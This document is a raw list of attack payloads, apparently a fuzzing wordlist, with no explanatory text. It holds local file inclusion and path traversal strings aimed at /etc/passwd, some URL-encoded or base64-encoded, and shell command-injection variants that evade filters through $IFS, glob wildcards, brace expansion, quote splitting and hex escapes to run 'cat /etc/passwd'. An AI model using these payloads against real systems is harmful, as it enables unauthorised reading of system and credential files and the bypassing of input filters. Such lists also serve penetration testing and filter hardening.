file:///etc/passwd
view-source:file:///etc/passwd
file:/etc/passwd?/
file:///etc/?/../passwd
file:${br}/et${u}c/pas${te}swd?/
file:/etc/passwd?/
file:/etc/passwd%3F/
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/%3F/../passwd
file:${br}/et${u}c/pas${te}swd?/
file:$(br)/et$(u)c/pas$(te)swd?/
file:${br}/et${u}c%252Fpas${te}swd?/
file:$(br)/et$(u)c%252Fpas$(te)swd?/
file:${br}/et${u}c%252Fpas${te}swd%3F/
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/
file:///etc/passwd?/../passwd
text:/etc/passwd
/etc/passwd
../../etc/passwd
../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
L2V0Yy9wYXNzd2Q=
/*/?at$IFS/???/???swd
/****/?at$IFS/???/*swd
/****/?at$IFS/???/*******swd
/???/???/c?t$IFS/?t?/p?s?wd
{\c''\a""t,/e''*?/?a?s??}
{\c''\a""\t,/\e''*?/\p*\d}
IFS=,;`cat<<<cat,/etc/passwd`
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
cat</etc/passwd
{cat,/etc/passwd}
X=$'cat\x20/etc/passwd'&&$X
cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss??